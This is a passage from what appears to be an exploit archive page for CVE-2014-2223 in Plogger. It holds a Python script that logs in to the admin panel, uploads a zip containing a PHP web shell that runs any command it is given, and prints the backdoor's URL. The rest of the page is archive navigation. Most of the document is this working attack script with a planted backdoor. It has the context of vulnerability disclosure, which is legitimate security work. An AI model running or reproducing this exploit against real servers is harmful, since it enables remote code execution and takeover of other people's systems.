Plogger Authenticated Arbitrary File Upload

Plogger Authenticated Arbitrary File Upload: Posted Aug 28, 2014; Authored by b0z; Plogger versions prior to 1.0-RC1 suffer from a remote authenticated arbitrary file upload vulnerability.; tags | exploit, remote, arbitrary, file upload; advisories | CVE-2014-2223; SHA-256 | 2229ede1572118bc72b109ff7e6d3bbcc1f082c43c519ec37c7328ee927f4032; Download | Favorite | View

Plogger Authenticated Arbitrary File Upload

#!/usr/bin/env python


# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223

import hashlib
import os
import zipfile

import requests
import time
import argparse



def login(session,host,username,password):
    print "[+] Log in"

    session.post('http://%s/plog-admin/plog-upload.php' % host, data={
        "plog_username": username,
        "plog_password": password,
        "action": "log_in"
    })

def upload(session):
    print "[+] Creating poisoned gift"
    ## Write the backdoor
    backdoor = open(magic + '.php', 'w+', buffering = 0)
    backdoor.write("<?php system($_GET['cmd']) ?>")
    backdoor.close

    # Add true image file to block the race condition (mandatory not null)
    image = open(magic + '.png', 'w+', buffering = 0)
    image.write('A')
    image.close

    gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
    gift.write(magic + '.php')
    gift.write(magic + '.png')
    gift.close

    os.remove(magic + '.php')
    os.remove(magic + '.png')

    gift = open(magic + '.zip', 'rb')
    files= { "userfile": ("archive.zip", gift)}
    session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
        data = {
            "destination_radio":"existing",
            "albums_menu" : "1",
            "new_album_name":"",
            "collections_menu":"1",
            "upload":"Upload"
    })

    os.remove(magic + '.zip')
    print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)

if __name__== "__main__":

    parser = argparse.ArgumentParser()
    parser.add_argument("--host"        , help="Remote host",required=True)
    parser.add_argument("--user"        , help="Username",required=True)
    parser.add_argument("--password"    , help="Password",required=True)
    args = parser.parse_args()

    host     = args.host
    username = args.user
    password = args.user

    magic = hashlib.sha1(time.asctime()).hexdigest()

    session = requests.session()
    login(session,host,username,password)
    upload(session)

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Plogger Authenticated Arbitrary File Upload

Plogger Authenticated Arbitrary File Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Plogger Authenticated Arbitrary File Upload

Share This

Plogger Authenticated Arbitrary File Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems